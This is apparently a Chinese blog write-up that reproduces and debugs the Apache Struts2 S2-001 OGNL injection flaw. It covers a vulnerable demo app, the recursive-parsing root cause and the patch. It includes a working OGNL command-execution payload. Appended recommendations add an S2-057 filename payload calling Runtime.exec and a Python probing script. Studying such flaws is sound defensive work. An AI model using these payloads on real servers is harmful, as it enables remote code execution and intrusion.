S2-001本地复现与分析

最新推荐文章于 2025-03-17 17:44:31 发布
最新推荐文章于 2025-03-17 17:44:31 发布
阅读量1.5k 收藏
点赞数 1
分类专栏: 漏洞利用 文章标签: struts2 远程代码执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Auuuuuuuu/article/details/86775808
版权

环境搭建:win10   eclipes ee    struts2.0.1   tomcat8

导入最基础的jar包

web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://xmlns.jcp.org/xml/ns/javaee" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd" id="WebApp_ID" version="3.1">
  <display-name>S2-001 Example</display-name>
  <filter>
    <filter-name>struts2</filter-name>
    <filter-class>org.apache.struts2.dispatcher.FilterDispatcher</filter-class>
  </filter>
  <filter-mapping>
    <filter-name>struts2</filter-name>
    <url-pattern>/*</url-pattern>
  </filter-mapping>
  <welcome-file-list>
    <welcome-file>index.jsp</welcome-file>
  </welcome-file-list>
</web-app>

LoginAction.java

package com.au.demo.action;

import com.opensymphony.xwork2.ActionSupport;

public class LoginAction extends ActionSupport {
    private String username = null;
    private String password = null;

    public String getUsername() {
        return this.username;
    }

    public String getPassword() {
        return this.password;
    }

    public void setUsername(String username) {
        this.username = username;
    }

    public void setPassword(String password) {
        this.password = password;
    }

    public String execute() throws Exception {
        if ((this.username.isEmpty()) || (this.password.isEmpty())) {
            return ERROR;
        }
        if ((this.username.equalsIgnoreCase("admin"))
                && (this.password.equals("password"))) {
            return SUCCESS;
        }
        return ERROR;
    }
}

index.jsp

<%@ page language="java" contentType="text/html; charset=UTF-8"
         pageEncoding="UTF-8"%>
<%@ taglib prefix="s" uri="/struts-tags" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <title>S2-001</title>
</head>
<body>
<h2>S2-001 Demo</h2>
<s:form action="login">
  <s:textfield name="username" label="username" />
  <s:textfield name="password" label="password" />
  <s:submit></s:submit>
</s:form>
</body>
</html>

struts.xml

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE struts PUBLIC
	"-//Apache Software Foundation//DTD Struts Configuration 2.3//EN"
	"http://struts.apache.org/dtds/struts-2.3.dtd">

<struts>
	<constant name="struts.devMode" value="true" /> 
	<package name="S2-001" extends="struts-default">
        <action name="login" class="com.au.demo.action.LoginAction">
            <result name="success">/welcome.jsp</result>
            <result name="error">/index.jsp</result>
        </action>
    </package>
	
</struts>

导入对应的xwork.jar源码进行调试(找源码坑死我了)

有需要的这是本人搭建的环境下载地址:

https://pan.baidu.com/s/1_BBEIfoX-WSjLHQcqstVPA   提取码:aklq

测试点击提交:

构造的ognl被执行:

任意代码执行的POC:

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),
#f.getWriter().close()
}

pwd替换为对应的命令,即可执行。

 

漏洞分析:

漏洞成因:

     可执行代码(ognl(可理解为代码)):

     在translateVariables方法中,递归解析表达式,在处理完%{password}后将password的值直接取出并继续在while循环中解析,若用户输入的password是恶意的ognl表达式,则得以解析执行。

     输入点:可构造恶意参数

     输出点:利用登录失败会重新返回页面并回带之前的输入内容

 

 

在xwork的jar包下com.opensymphony.xwork2.util.TextUtils 98行设置断点debug tomcat单步调试

关键代码:

 public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator) {
        // deal with the "pure" expressions first!
        //expression = expression.trim();
        Object result = expression;

        while (true) {
            int start = expression.indexOf(open + "{");
            int length = expression.length();
            int x = start + 2;
            int end;
            char c;
            int count = 1;
            while (start != -1 && x < length && count != 0) {
                c = expression.charAt(x++);
                if (c == '{') {
                    count++;
                } else if (c == '}') {
                    count--;
                }
            }
            end = x - 1;

            if ((start != -1) && (end != -1) && (count == 0)) {
                String var = expression.substring(start + 2, end);

                Object o = stack.findValue(var, asType);
                if (evaluator != null) {
                	o = evaluator.evaluate(o);
                }
                

                String left = expression.substring(0, start);
                String right = expression.substring(end + 1);
                if (o != null) {
                    if (TextUtils.stringSet(left)) {
                        result = left + o;
                    } else {
                        result = o;
                    }

                    if (TextUtils.stringSet(right)) {
                        result = result + right;
                    }

                    expression = left + o + right;
                } else {
                    // the variable doesn't exist, so don't display anything
                    result = left + right;
                    expression = left + right;
                }
            } else {
                break;
            }
        }

        return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);
    }

 

通过对比username和password来进行分析:

顺序执行,expression值为username

 

多个return递归回到该方法,通过  stack.findValue() 得到username的输入值, 最后aaa 被赋值给 expression

 

注意这里和password进行比较~

继续单步调试再次进入该方法(递归解析ognl):不符合while执行118行

此时不符合if条件     if ((start != -1) && (end != -1) && (count == 0)) 

进入多次return结束对username标签的执行回显到页面上


 

顺序执行,expression值为password

 

多个return递归回到该方法,通过  stack.findValue() 得到password的输入值,此时我们输入password的值 %{3+4}  被赋值给 expression

 

再次进入该方法,此时为ognl表示式,符合while条件和if判断,接下来就顺序解析了我们的  %{3+4}   expression赋值为7

进入多次return结束对password标签的执行回显到页面上

 

 

漏洞修复:

改变了ognl表达式的解析方法从而不会产生递归解析,用户的输入也不会再解析执行。

修补后的代码:增加判断

if (loopCount > maxLoopCount) {
    // translateVariables prevent infinite loop / expression recursive evaluation
    break;
}

当解析完一层表达式后,使其不符合上述判断,不再向下执行,执行break,跳出while(true)循环

源码(注释写的很清楚):

public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator, int maxLoopCount) {
    // deal with the "pure" expressions first!
    //expression = expression.trim();
    Object result = expression;
    int loopCount = 1;
    int pos = 0;
    while (true) {
        
        int start = expression.indexOf(open + "{", pos);
        if (start == -1) {
            pos = 0;
            loopCount++;
            start = expression.indexOf(open + "{");
        }
        if (loopCount > maxLoopCount) {
            // translateVariables prevent infinite loop / expression recursive evaluation
            break;
        }
        int length = expression.length();
        int x = start + 2;
        int end;
        char c;
        int count = 1;
        while (start != -1 && x < length && count != 0) {
            c = expression.charAt(x++);
            if (c == '{') {
                count++;
            } else if (c == '}') {
                count--;
            }
        }
        end = x - 1;

 

【漏洞复现Struts2 S2-062 (CVE-2021-31805) 远程代码执行漏洞
李火火的安全圈
04-15 3698
文章目录声明前言一、漏洞描述二、漏洞原理三、影响版本四、安全版本五、漏洞细节分析六、本地复现七、漏洞修复 声明 本篇文章仅用于技术研究和漏洞复现,切勿从事非法渗透,造成任何影响本作者无关,切记! 前言 Apache 官方发布了 Apache Struts2 的风险通告,漏洞编号为 CVE-2021-31805,可能会导致远程代码执行。 一、漏洞描述 此次 Apache Struts2 漏洞为 CVE-2020-17530 ( S2-061 )的修复不完整,导致输入验证不正确。 如果开发人员使用%{…}
Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)漏洞复现
sechelper的博客
01-11 895
cve漏洞详细复现,漏洞利用,反弹shell,工具分享
s2-001漏洞复现
m0_74859491的博客
03-13 635
开启docker进入vulhub —struts2—s2-001命令:cd vulhub/struts2/s2-001。执行了payload 里的语句 pwd , 回显出路径:/usr/local/tomcat。(Readme.md 英文说明, Readme.zh-cn.md 中文说明)先查看说明文件 命令:cat Readme.zh-cn.md。3、启用测试环境:docker-compose up -d。回显出路径:/usr/local/tomcat。请参阅《中华人民共和国网络安全法》
Struts2 远程代码执行漏洞S2-001分析
st3pby的博客
01-05 1201
首先来了解 OGNL 表达式,OGNL(Object Graphic Navigatino Language)的中文全称为“对象图导航语言”,是应用于Java中的一个开源的功能强大的表达式语言(Expression Language),它被集成在Struts2等框架中,通过简单一致的表达式语法,可以存取对象的任何属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。OGNL进行对象存取操作的API在Ognl.java文件中,分别是getValue、setValue两个方法。
CVE重要漏洞复现Struts2漏洞S2-001
没有网络安全就没有国家安全
03-17 391
CVE重要漏洞复现Struts2漏洞S2-001
[struts2]s2-001
satasun的博客
12-09 311
[struts2]s2-001 环境搭建 Github buuctf poc 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 测试一下: exp 获取Tomcat执行路径: %{@java.lang.Syste
S2-001远程代码执行(CVE-2007-4556)
m0_65150886的博客
01-15 702
其全新的Struts 2的体系结构Struts 1的体系结构差别巨大,其在Action的实现方面线程模型方面、Servlet依赖方面、封装请求参数、表达式语言方面、绑定值到视图技术、类型转换、Action执行控制的对比、拦截器的应用等方面较Struts1进行了较大改进。Struts 2允许用户提交包含 OGNL 表达式字符串的表单数据,若表单验证失败,则服务器会将用户之前提交的OGNL 表达式(如:%{1+1})进行解析执行,然后将结果重新填充到对应的表单数据中。6.6成功获取反弹shell。
struts2之s2-001
weixin_42075643的博客
01-11 432
 S2-001 影响版本:Struts 2.0.0 - Struts 2.0.8 漏洞分析: 1、 密码框可以执行代码(OGNL表达式)若输入%{1+2}会因为错误报告内容得出结果3,因此存在远程执行的漏洞,属于owasp top 10中的不安全的反序列化漏洞 2、 在输入内容时,因为代码中的递归解析表达式(源码是while表达式),在执行完%{password}后,会继续执行password内容,因此可以进行远程命令执行 3、 解决方法是,改变代码表达式的表达方法,使之不会产生递归解析即可。也就是将st
分布式一致性协议三部曲-从paxos幽灵复现看Raft实现原理
一点码客
04-25 854
幽灵复现 Mutlti-Paxos下存在Leader切换情况,因而可能出现下面的场景 第一轮中A被选为 Leader,写下了 1-10 号日志,其中 1-5 号日志形成了多数派,并且已给客户端应答,而对于 6-10 号日志,客户端超时未能得到应答。 第二轮,A 宕机,B 被选为 Leader,由于 B 和 C 的最大的 LogID 都是 5,因此 B 不会去重确认 6 ...
S2E符号执行平台使用文档入门教程
S2E引擎负责执行程序以及收集路径约束,而S2E工具包则提供了S2E引擎交互的API,以及用于分析和展示结果的工具。 - **S2E引擎:** 是核心组件,通过其虚拟化环境运行目标软件,收集程序路径信息以及相关的系统状态...
【IRIG 106-19:遥测数据存储的未来】:兼容性分析解决方案
![IRIG 106-19_Telemetry_Standards(2019合集完整版).pdf]...本文详细探讨了IRIG 106-19标准的理论基础,包括数据帧结构、编码调制技术及数据完整性校验,同时分析了遥测数据存储的
S2-001漏洞分析
灰蜗牛
02-23 1511
Struts2是流行和成熟的基于MVC设计模式的Web应用程序框架。S2-001漏洞是由于 Struts 2 框架处理 HTTP 请求中某些参数的方式存在缺陷。具体来说,该框架无法正确验证这些参数中的用户输入,从而允许攻击者将恶意负载注入应用程序。有效负载可以包含应用程序处理请求时在服务器上执行的任意代码。
S2-001-RCE(CVE-2007-4556)--vulhub
ccc_9wy的博客
12-27 439
struts2漏洞复现;S2-001-RCE;CVE-2007-4556;vulhub;反弹shell;OGNL表达式。
s2 -001漏洞手工复现
weixin_48421613的博客
06-02 271
打了某靶场之后清晰地认识到了自己的不足,好多东西都不知道是干啥,一脸的懵逼,果然渗透测试安全评估和打靶场拿shell是两个不同的工作,我承认我还是太菜。。。。。。 这个是我知道的,只需要在用户名输入 %{1+1} 密码瞎写就行,然后点击提交,若是账号位置变成2,则证明存在漏洞 %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ls",})).redirectErrorStream(true).start(),#b=#a.getInputSt
漏洞代码调试(二):Strtus2-001代码分析调试
thelostworld
08-20 961
​ Strtus2-001代码分析调试(学习笔记) 一、漏洞描述: Struts2 中的validation机制。validation依靠validation和workflow两个拦截器。validation会根据配置的xml文件创建一个特殊字段错误列表。而workflow则会根据validation的错误对其进行检测,如果输入有值,将会把用户带回到原先提交表单的页面,并且将值返回。反之,在默认情况下,如果控制器没有得到任何的输入结果但是有validation验证错误。那么用户...
S2-001 远程代码执行 漏洞复现
Senimo
07-27 3262
S2-001 远程代码执行 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。 二、漏洞影响 三、漏洞复现 1
S2-001 远程代码执行漏洞
Fly_鹏程万里
12-14 963
漏洞原理 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如:当你提交的登录表单为username=admin&amp;password=%{1+1}时,后端验证登录失败后会返回登录界面并显示你的输入,这时password字段中的OGNL表达式已经被解析处理过了,所以会显示%{1+1}的...
Structs2系列漏洞 S2-001漏洞复现
weixin_43885355的博客
03-31 439
Structs2系列漏洞 S2-001漏洞复现 参考链接: https://blog.youkuaiyun.com/qq_29647709/article/details/84945159 0x01漏洞简介         该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{
s2-057漏洞复现
最新发布
03-19
### Struts2 S2-057 漏洞概述 Struts2 的 S2-057 漏洞主要源于其对多部分请求(multipart requests)处理不当,允许攻击者通过构造恶意的 Content-Disposition 头部来触发 OGNL 表达式的执行[^2]。此漏洞可能导致远程代码执行 (RCE),从而让攻击者完全控制目标服务器。 --- ### S2-057 漏洞复现环境准备 为了成功复现该漏洞,需搭建如下测试环境: #### 1. **依赖组件** - Apache Struts2 版本:受影响版本为 2.3.x 前缀至 2.3.322.5.x 前缀至 2.5.10。 - Java 运行时环境 (JRE/JDK):建议使用 JDK 8 或更低版本以匹配当时的开发环境。 - Web 容器:Tomcat 是常用的容器之一。 #### 2. **配置文件调整** 确保 `struts.xml` 文件中启用了文件上传功能的相关设置: ```xml <interceptors> <interceptor-stack name="fileUploadStack"> <interceptor-ref name="defaultStack"/> <interceptor-ref name="fileUpload"/> </interceptor-stack> </interceptors> <action name="upload" class="com.example.UploadAction"> <interceptor-ref name="fileUploadStack"/> <result>/success.jsp</result> </action> ``` 上述配置表明应用支持文件上传操作,并可能暴露潜在风险。 --- ### S2-057 测试方法 以下是针对 S2-057 漏洞的具体测试流程: #### 1. 构造 HTTP 请求包 利用工具如 Burp Suite 发送自定义 POST 请求,其中包含恶意的 Content-Disposition 参数。例如: ```http POST /struts2-showcase/fileupload/upload.action HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: multipart/form-data; boundary=---------------------------243620506915724 Content-Length: 253 -----------------------------243620506915724 Content-Disposition: form-data; name="foo"; filename="${@java.lang.Runtime@getRuntime().exec('calc')}" Content-Type: application/octet-stream test -----------------------------243620506915724-- ``` 在此示例中,`${}` 结构被用于嵌入 OGNL 表达式,尝试调用系统命令 `calc.exe` 来验证 RCE 能力。 #### 2. 验证漏洞效果 如果存在漏洞,则会观察到以下现象之一: - Windows 平台上弹出计算器窗口; - Linux/MacOS 上运行指定脚本或程序。 这证明了攻击者能够成功执行任意代码。 --- ### 编写自动化检测脚本 可以编写 Python 脚本来批量扫描是否存在此类漏洞。下面是一个简单的 PoC 实现: ```python import requests def test_s2_057(url, command='whoami'): headers = { 'User-Agent': 'Mozilla/5.0', 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary' } data = f'------WebKitFormBoundary\r\nContent-Disposition: form-data; name="foo"; filename="${{{"@".join(["@java", "lang", "Runtime@", "getRuntime()", ".exec(", repr(command), ")"])}}}"\r\nContent-Type: application/octet-stream\r\n\r\ntest\r\n------WebKitFormBoundary--' try: response = requests.post(url, headers=headers, data=data, timeout=10) if response.status_code == 200 and ('error' not in response.text.lower()): print(f"[+] Potential vulnerability detected at {url}") else: print(f"[-] No vulnerability found or error occurred.") except Exception as e: print(f"[!] Error during request: {e}") if __name__ == "__main__": target_url = input("Enter the URL to test: ").strip() test_s2_057(target_url) ``` 以上代码片段发送了一个带有特殊 payload 的 POST 请求给目标地址并解析响应结果判断是否有异常行为发生。 --- ### 总结 通过对 Struts2 S2-057 漏洞的学习可知,它属于典型的因输入校验不足引发的安全隐患案例。因此,在实际项目开发过程中应严格遵循最小权限原则以及充分的数据清洗机制防止类似问题再次出现。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值